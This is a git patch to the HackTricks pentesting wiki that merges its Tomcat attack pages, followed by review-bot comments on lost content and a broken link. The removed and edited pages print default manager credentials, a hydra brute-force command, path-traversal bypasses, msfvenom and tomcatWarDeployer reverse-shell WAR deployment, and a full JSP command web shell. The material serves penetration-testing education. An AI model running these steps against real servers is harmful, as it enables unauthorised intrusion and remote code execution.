From b3ead6982190b7a56560ee93c684c7a6570718ee Mon Sep 17 00:00:00 2001 From: CPol Date: Thu, 12 Dec 2024 00:29:39 +0000 Subject: [PATCH] GITBOOK-4443: No subject --- SUMMARY.md | 3 +- .../pentesting-web/README.md | 18 +- .../pentesting-web/tomcat.md | 43 ++- .../pentesting-web/tomcat/README.md | 278 ------------------ .../tomcat/basic-tomcat-info.md | 169 ----------- .../jinja2-ssti.md | 14 +- 6 files changed, 48 insertions(+), 477 deletions(-) delete mode 100644 network-services-pentesting/pentesting-web/tomcat/README.md delete mode 100644 network-services-pentesting/pentesting-web/tomcat/basic-tomcat-info.md diff --git a/SUMMARY.md b/SUMMARY.md index 7c6a57f4cd5..c418f53a1c8 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -430,8 +430,7 @@ * [Source code Review / SAST Tools](network-services-pentesting/pentesting-web/code-review-tools.md) * [Spring Actuators](network-services-pentesting/pentesting-web/spring-actuators.md) * [Symfony](network-services-pentesting/pentesting-web/symphony.md) - * [Tomcat](network-services-pentesting/pentesting-web/tomcat/README.md) - * [Basic Tomcat Info](network-services-pentesting/pentesting-web/tomcat/basic-tomcat-info.md) + * [Tomcat](network-services-pentesting/pentesting-web/tomcat.md) * [Uncovering CloudFlare](network-services-pentesting/pentesting-web/uncovering-cloudflare.md) * [VMWare (ESX, VCenter...)](network-services-pentesting/pentesting-web/vmware-esx-vcenter....md) * [Web API Pentesting](network-services-pentesting/pentesting-web/web-api-pentesting.md) diff --git a/network-services-pentesting/pentesting-web/README.md b/network-services-pentesting/pentesting-web/README.md index 3e6ab65e8d4..f8ab8910f6a 100644 --- a/network-services-pentesting/pentesting-web/README.md +++ b/network-services-pentesting/pentesting-web/README.md 
@@ -9,13 +9,13 @@ Learn & practice GCP Hacking: Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. {% endhint %} -
+
**Get a hacker's perspective on your web apps, network, and cloud** @@ -104,7 +104,7 @@ Some **tricks** for **finding vulnerabilities** in different well known **techno * [**H2 - Java SQL database**](h2-java-sql-database.md) * [**IIS tricks**](iis-internet-information-services.md) * [**JBOSS**](jboss.md) -* [**Jenkins**]([https://github.com/carlospolop/hacktricks/blob/master/network-services-pentesting/pentesting-web/broken-reference/README.md](https://github.com/HackTricks-wiki/hacktricks-cloud/tree/master/pentesting-ci-cd/jenkins-security)) +* [**Jenkins**](\[https:/github.com/carlospolop/hacktricks/blob/master/network-services-pentesting/pentesting-web/broken-reference/README.md]\(https:/github.com/HackTricks-wiki/hacktricks-cloud/tree/master/pentesting-ci-cd/jenkins-security\)/) * [**Jira**](jira.md) * [**Joomla**](joomla.md) * [**JSP**](jsp.md) @@ -115,7 +115,7 @@ Some **tricks** for **finding vulnerabilities** in different well known **techno * [**Python**](python.md) * [**Spring Actuators**](spring-actuators.md) * [**Symphony**](symphony.md) -* [**Tomcat**](tomcat/) +* [**Tomcat**](tomcat.md) * [**VMWare**](vmware-esx-vcenter....md) * [**Web API Pentesting**](web-api-pentesting.md) * [**WebDav**](put-method-webdav.md) 
@@ -161,7 +161,7 @@ node puff.js -w ./wordlist-examples/xss.txt -u "http://www.xssgame.com/f/m4KKGHi If a CMS is used don't forget to **run a scanner**, maybe something juicy is found: -[**Clusterd**](https://github.com/hatRiot/clusterd)**:** [**JBoss**](jboss.md)**, ColdFusion, WebLogic,** [**Tomcat**](tomcat/)**, Railo, Axis2, Glassfish**\ +[**Clusterd**](https://github.com/hatRiot/clusterd)**:** [**JBoss**](jboss.md)**, ColdFusion, WebLogic,** [**Tomcat**](tomcat.md)**, Railo, Axis2, Glassfish**\ [**CMSScan**](https://github.com/ajinabraham/CMSScan): [**WordPress**](wordpress.md), [**Drupal**](drupal/), **Joomla**, **vBulletin** websites for Security issues. (GUI)\ [**VulnX**](https://github.com/anouarbensaad/vulnx)**:** [**Joomla**](joomla.md)**,** [**Wordpress**](wordpress.md)**,** [**Drupal**](drupal/)**, PrestaShop, Opencart**\ **CMSMap**: [**(W)ordpress**](wordpress.md)**,** [**(J)oomla**](joomla.md)**,** [**(D)rupal**](drupal/) **or** [**(M)oodle**](moodle.md)\ @@ -278,7 +278,7 @@ Tools: **Recommended dictionaries:** -* [https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/bf\_directories.txt](https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/bf\_directories.txt) +* [https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/bf\_directories.txt](https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/bf_directories.txt) * [**Dirsearch** included dictionary](https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt) * [http://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10](http://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10) * [Assetnote wordlists](https://wordlists.assetnote.io) 
@@ -362,14 +362,14 @@ Now that a comprehensive enumeration of the web application has been performed i Find more info about web vulns in: * [https://six2dez.gitbook.io/pentest-book/others/web-checklist](https://six2dez.gitbook.io/pentest-book/others/web-checklist) -* [https://kennel209.gitbooks.io/owasp-testing-guide-v4/content/en/web\_application\_security\_testing/configuration\_and\_deployment\_management\_testing.html](https://kennel209.gitbooks.io/owasp-testing-guide-v4/content/en/web\_application\_security\_testing/configuration\_and\_deployment\_management\_testing.html) +* [https://kennel209.gitbooks.io/owasp-testing-guide-v4/content/en/web\_application\_security\_testing/configuration\_and\_deployment\_management\_testing.html](https://kennel209.gitbooks.io/owasp-testing-guide-v4/content/en/web_application_security_testing/configuration_and_deployment_management_testing.html) * [https://owasp-skf.gitbook.io/asvs-write-ups/kbid-111-client-side-template-injection](https://owasp-skf.gitbook.io/asvs-write-ups/kbid-111-client-side-template-injection) ### Monitor Pages for changes You can use tools such as [https://github.com/dgtlmoon/changedetection.io](https://github.com/dgtlmoon/changedetection.io) to monitor pages for modifications that might insert vulnerabilities. -
+
**Get a hacker's perspective on your web apps, network, and cloud** @@ -458,7 +458,7 @@ Learn & practice GCP Hacking: Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/network-services-pentesting/pentesting-web/tomcat.md b/network-services-pentesting/pentesting-web/tomcat.md index a5e46cae3cc..4806c198cb7 100644 --- a/network-services-pentesting/pentesting-web/tomcat.md +++ b/network-services-pentesting/pentesting-web/tomcat.md @@ -1,15 +1,15 @@ # Tomcat {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
@@ -20,7 +20,7 @@ Learn & practice GCP Hacking:
+
## Enumeration @@ -156,7 +156,7 @@ msf exploit(multi/http/tomcat_mgr_upload) > exploit 1. Create the war to deploy: ```bash -msfvenom -p java/shell_reverse_tcp LHOST= LPORT= -f war -o revshell.war +msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war -o revshell.war ``` 2. Upload the `revshell.war` file and access to it (`/revshell/`): @@ -239,17 +239,32 @@ zip -r backup.war cmd.jsp ## POST -Name of Tomcat credentials file is _tomcat-users.xml_ +Name of Tomcat credentials file is `tomcat-users.xml` and this file indicates the role of the user inside tomcat. ```bash find / -name tomcat-users.xml 2>/dev/null ``` -Other ways to gather Tomcat credentials: - -```bash -msf> use post/multi/gather/tomcat_gather -msf> use post/windows/gather/enum_tomcat +Example: + +```xml +[...] + +[...] + + + + ``` ## Other tomcat scanning tools @@ -262,15 +277,15 @@ msf> use post/windows/gather/enum_tomcat * [https://hackertarget.com/sample/nexpose-metasploitable-test.pdf](https://hackertarget.com/sample/nexpose-metasploitable-test.pdf) {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
diff --git a/network-services-pentesting/pentesting-web/tomcat/README.md b/network-services-pentesting/pentesting-web/tomcat/README.md deleted file mode 100644 index dc47450f449..00000000000 --- a/network-services-pentesting/pentesting-web/tomcat/README.md +++ /dev/null @@ -1,278 +0,0 @@ -# Tomcat - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Discovery - -* It usually runs on **port 8080** -* **Common Tomcat error:** - -
- -## Enumeration - -### **Version Identification** - -To find the version of Apache Tomcat, a simple command can be executed: - -```bash -curl -s http://tomcat-site.local:8080/docs/ | grep Tomcat -``` - -This will search for the term "Tomcat" in the documentation index page, revealing the version in the title tag of the HTML response. - -### **Manager Files Location** - -Identifying the exact locations of **`/manager`** and **`/host-manager`** directories is crucial as their names might be altered. A brute-force search is recommended to locate these pages. - -### **Username Enumeration** - -For Tomcat versions older than 6, it's possible to enumerate usernames through: - -```bash -msf> use auxiliary/scanner/http/tomcat_enum -``` - -### **Default Credentials** - -The **`/manager/html`** directory is particularly sensitive as it allows the upload and deployment of WAR files, which can lead to code execution. This directory is protected by basic HTTP authentication, with common credentials being: - -* admin:admin -* tomcat:tomcat -* admin: -* admin:s3cr3t -* tomcat:s3cr3t -* admin:tomcat - -These credentials can be tested using: - -```bash -msf> use auxiliary/scanner/http/tomcat_mgr_login -``` - -Another notable directory is **`/manager/status`**, which displays the Tomcat and OS version, aiding in vulnerability identification. - -### **Brute Force Attack** - -To attempt a brute force attack on the manager directory, one can use: - -```bash -hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html -``` - -Along with setting various parameters in Metasploit to target a specific host. - -## Common Vulnerabilities - -### **Password Backtrace Disclosure** - -Accessing `/auth.jsp` may reveal the password in a backtrace under fortunate circumstances. 
- -### **Double URL Encoding** - -The CVE-2007-1860 vulnerability in `mod_jk` allows for double URL encoding path traversal, enabling unauthorized access to the management interface via a specially crafted URL. - -In order to access to the management web of the Tomcat go to: `pathTomcat/%252E%252E/manager/html` - -### /examples - -Apache Tomcat versions 4.x to 7.x include example scripts that are susceptible to information disclosure and cross-site scripting (XSS) attacks. These scripts, listed comprehensively, should be checked for unauthorized access and potential exploitation. Find [more info here](https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/) - -* /examples/jsp/num/numguess.jsp -* /examples/jsp/dates/date.jsp -* /examples/jsp/snp/snoop.jsp -* /examples/jsp/error/error.html -* /examples/jsp/sessions/carts.html -* /examples/jsp/checkbox/check.html -* /examples/jsp/colors/colors.html -* /examples/jsp/cal/login.html -* /examples/jsp/include/include.jsp -* /examples/jsp/forward/forward.jsp -* /examples/jsp/plugin/plugin.jsp -* /examples/jsp/jsptoserv/jsptoservlet.jsp -* /examples/jsp/simpletag/foo.jsp -* /examples/jsp/mail/sendmail.jsp -* /examples/servlet/HelloWorldExample -* /examples/servlet/RequestInfoExample -* /examples/servlet/RequestHeaderExample -* /examples/servlet/RequestParamExample -* /examples/servlet/CookieExample -* /examples/servlet/JndiServlet -* /examples/servlet/SessionExample -* /tomcat-docs/appdev/sample/web/hello.jsp - -### **Path Traversal Exploit** - -In some [**vulnerable configurations of Tomcat**](https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/) you can gain access to protected directories in Tomcat using the path: `/..;/` - -So, for example, you might be able to **access the Tomcat manager** page by accessing: `www.vulnerable.com/lalala/..;/manager/html` - -**Another way** to bypass protected paths using this trick is to access 
`http://www.vulnerable.com/;param=value/manager/html` - -## RCE - -Finally, if you have access to the Tomcat Web Application Manager, you can **upload and deploy a .war file (execute code)**. - -### Limitations - -You will only be able to deploy a WAR if you have **enough privileges** (roles: **admin**, **manager** and **manager-script**). Those details can be find under _tomcat-users.xml_ usually defined in `/usr/share/tomcat9/etc/tomcat-users.xml` (it vary between versions) (see [POST ](./#post)section). - -```bash -# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed - -# deploy under "path" context path -curl --upload-file monshell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/monshell" - -# undeploy -curl "http://tomcat:Password@localhost:8080/manager/text/undeploy?path=/monshell" -``` - -### Metasploit - -```bash -use exploit/multi/http/tomcat_mgr_upload -msf exploit(multi/http/tomcat_mgr_upload) > set rhost -msf exploit(multi/http/tomcat_mgr_upload) > set rport -msf exploit(multi/http/tomcat_mgr_upload) > set httpusername -msf exploit(multi/http/tomcat_mgr_upload) > set httppassword -msf exploit(multi/http/tomcat_mgr_upload) > exploit -``` - -### MSFVenom Reverse Shell - -1. Create the war to deploy: - -```bash -msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war -o revshell.war -``` - -2. 
Upload the `revshell.war` file and access to it (`/revshell/`): - -### Bind and reverse shell with [tomcatWarDeployer.py](https://github.com/mgeeky/tomcatWarDeployer) - -In some scenarios this doesn't work (for example old versions of sun) - -#### Download - -```bash -git clone https://github.com/mgeeky/tomcatWarDeployer.git -``` - -#### Reverse shell - -```bash -./tomcatWarDeployer.py -U -P -H -p :/manager/html/ -``` - -#### Bind shell - -```bash -./tomcatWarDeployer.py -U -P -p :/manager/html/ -``` - -### Using [Culsterd](https://github.com/hatRiot/clusterd) - -```bash -clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows -``` - -### Manual method - Web shell - -Create **index.jsp** with this [content](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp): - -```java -
- - -
-<%@ page import="java.io.*" %> -<% - String cmd = request.getParameter("cmd"); - String output = ""; - if(cmd != null) { - String s = null; - try { - Process p = Runtime.getRuntime().exec(cmd,null,null); - BufferedReader sI = new BufferedReader(new -InputStreamReader(p.getInputStream())); - while((s = sI.readLine()) != null) { output += s+"
"; } - } catch(IOException e) { e.printStackTrace(); } - } -%> -
<%=output %>
-``` - -```bash -mkdir webshell -cp index.jsp webshell -cd webshell -jar -cvf ../webshell.war * -webshell.war is created -# Upload it -``` - -You could also install this (allows upload, download and command execution): [http://vonloesch.de/filebrowser.html](http://vonloesch.de/filebrowser.html) - -### Manual Method 2 - -Get a JSP web shell such as [this](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp) and create a WAR file: - -```bash -wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp -zip -r backup.war cmd.jsp -# When this file is uploaded to the manager GUI, the /backup application will be added to the table. -# Go to: http://tomcat-site.local:8180/backup/cmd.jsp -``` - -## POST - -Name of Tomcat credentials file is _tomcat-users.xml_ - -```bash -find / -name tomcat-users.xml 2>/dev/null -``` - -Other ways to gather Tomcat credentials: - -```bash -msf> use post/multi/gather/tomcat_gather -msf> use post/windows/gather/enum_tomcat -``` - -## Other tomcat scanning tools - -* [https://github.com/p0dalirius/ApacheTomcatScanner](https://github.com/p0dalirius/ApacheTomcatScanner) - -## References - -* [https://github.com/simran-sankhala/Pentest-Tomcat](https://github.com/simran-sankhala/Pentest-Tomcat) -* [https://hackertarget.com/sample/nexpose-metasploitable-test.pdf](https://hackertarget.com/sample/nexpose-metasploitable-test.pdf) - - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/network-services-pentesting/pentesting-web/tomcat/basic-tomcat-info.md b/network-services-pentesting/pentesting-web/tomcat/basic-tomcat-info.md deleted file mode 100644 index ef2af059f3b..00000000000 --- a/network-services-pentesting/pentesting-web/tomcat/basic-tomcat-info.md +++ /dev/null @@ -1,169 +0,0 @@ -# Basic Tomcat Info - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### Avoid to run with root - -In order to not run Tomcat with root a very common configuration is to set an Apache server in port 80/443 and, if the requested path matches a regexp, the request is sent to Tomcat running on a different port. - -### Default Structure - -``` -β”œβ”€β”€ bin -β”œβ”€β”€ conf -β”‚ β”œβ”€β”€ catalina.policy -β”‚ β”œβ”€β”€ catalina.properties -β”‚ β”œβ”€β”€ context.xml -β”‚ β”œβ”€β”€ tomcat-users.xml -β”‚ β”œβ”€β”€ tomcat-users.xsd -β”‚ └── web.xml -β”œβ”€β”€ lib -β”œβ”€β”€ logs -β”œβ”€β”€ temp -β”œβ”€β”€ webapps -β”‚ β”œβ”€β”€ manager -β”‚ β”‚ β”œβ”€β”€ images -β”‚ β”‚ β”œβ”€β”€ META-INF -β”‚ β”‚ └── WEB-INF -| | └── web.xml -β”‚ └── ROOT -β”‚ └── WEB-INF -└── work - └── Catalina - └── localhost -``` - -* The `bin` folder stores scripts and binaries needed to start and run a Tomcat server. -* The `conf` folder stores various configuration files used by Tomcat. -* The `tomcat-users.xml` file stores user credentials and their assigned roles. -* The `lib` folder holds the various JAR files needed for the correct functioning of Tomcat. -* The `logs` and `temp` folders store temporary log files. -* The `webapps` folder is the default webroot of Tomcat and hosts all the applications. The `work` folder acts as a cache and is used to store data during runtime. - -Each folder inside `webapps` is expected to have the following structure. - -``` -webapps/customapp -β”œβ”€β”€ images -β”œβ”€β”€ index.jsp -β”œβ”€β”€ META-INF -β”‚ └── context.xml -β”œβ”€β”€ status.xsd -└── WEB-INF - β”œβ”€β”€ jsp - | └── admin.jsp - └── web.xml - └── lib - | └── jdbc_drivers.jar - └── classes - └── AdminServlet.class -``` - -The most important file among these is `WEB-INF/web.xml`, which is known as the deployment descriptor. This file stores **information about the routes** used by the application and the classes handling these routes.\ -All compiled classes used by the application should be stored in the `WEB-INF/classes` folder. 
These classes might contain important business logic as well as sensitive information. Any vulnerability in these files can lead to total compromise of the website. The `lib` folder stores the libraries needed by that particular application. The `jsp` folder stores [Jakarta Server Pages (JSP)](https://en.wikipedia.org/wiki/Jakarta\_Server\_Pages), formerly known as `JavaServer Pages`, which can be compared to PHP files on an Apache server. - -Here’s an example **web.xml** file. - -```xml - - - - - - - AdminServlet - com.inlanefreight.api.AdminServlet - - - - AdminServlet - /admin - - -``` - -The `web.xml` configuration above defines a **new servlet named `AdminServlet`** that is mapped to the **class `com.inlanefreight.api.AdminServlet`**. Java uses the dot notation to create package names, meaning the path on disk for the class defined above would be: - -* **`classes/com/inlanefreight/api/AdminServlet.class`** - -Next, a new servlet mapping is created to **map requests to `/admin` with `AdminServlet`**. This configuration will send any request received for **`/admin` to the `AdminServlet.class`** class for processing. The **`web.xml`** descriptor holds a lot of **sensitive information** and is an important file to check when leveraging a **Local File Inclusion (LFI) vulnerability**. - -### tomcat-users - -The **`tomcat-users.xml`** file is used to **allow** or disallow access to the **`/manager` and `host-manager` admin pages**. - -```xml - - - - - - - - - - -!-- user manager can access only manager section --> - - - - - - - - - -``` - -The file shows us what each of the roles `manager-gui`, `manager-script`, `manager-jmx`, and `manager-status` provide access to. 
In this example, we can see that a user `tomcat` with the password `tomcat` has the `manager-gui` role, and a second weak password `admin` is set for the user account `admin` - -## References - -* [https://academy.hackthebox.com/module/113/section/1090](https://academy.hackthebox.com/module/113/section/1090) - - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md b/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md index 9d1bb120979..e6e7fd87dee 100644 --- a/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md +++ b/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md @@ -9,13 +9,13 @@ Learn & practice GCP Hacking: Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. {% endhint %} -
+
Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified: @@ -57,6 +57,7 @@ If the Debug Extension is enabled, a `debug` tag will be available to dump the c + ``` @@ -78,6 +79,7 @@ Source: [https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement] + ``` ## **Jinja Injection** @@ -143,6 +145,7 @@ dict.__mro__[-1] + # Not sure if this will work, but I saw it somewhere {{ [].class.base.subclasses() }} {{ ''.class.mro()[1].subclasses() }} @@ -228,6 +231,7 @@ http://localhost:5000/?c={{request|attr(request.args.getlist(request.args.l)|joi + ``` * [**Return here for more options to access a global object**](jinja2-ssti.md#accessing-global-objects) @@ -277,6 +281,7 @@ Without **`{{`** **`.`** **`[`** **`]`** **`}}`** **`_`** + ``` ## Jinja Injection without **\** @@ -372,8 +377,7 @@ The request will be urlencoded by default according to the HTTP format, which ca Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
+ Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified: @@ -384,7 +388,7 @@ Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
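Review bot: the SUMMARY.md hunk removes the `Basic Tomcat Info` entry and the patch deletes both `network-services-pentesting/pentesting-web/tomcat/README.md` and `tomcat/basic-tomcat-info.md`, but the diffstat (48 insertions, 477 deletions) shows almost nothing from `basic-tomcat-info.md` was carried into `tomcat.md`: the default directory layout, the explanation of `WEB-INF/web.xml` as the deployment descriptor, the note on fronting Tomcat with Apache so it does not run as root, the description of what the `manager-gui`, `manager-script`, `manager-jmx` and `manager-status` roles grant, and the HTB Academy reference all disappear. Suggest merging that material into `tomcat.md` in the same patch rather than dropping it, and since the README.md hunks rewrite internal `tomcat/` links to `tomcat.md`, consider a redirect for the old `tomcat/` path so external bookmarks keep working.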
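Review bot: the Jenkins entry in the `pentesting-web/README.md` hunk is still a malformed link after this change. The replacement `[**Jenkins**](\[https:/github.com/carlospolop/...]\(https:/github.com/HackTricks-wiki/...\)/)` nests an escaped markdown link inside the link target and uses `https:/` with a single slash, so it cannot render as a working link; the pre-image was broken in the same way (a bracketed pair of URLs as the target). Suggest a single plain target: `[**Jenkins**](https://github.com/HackTricks-wiki/hacktricks-cloud/tree/master/pentesting-ci-cd/jenkins-security)`.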
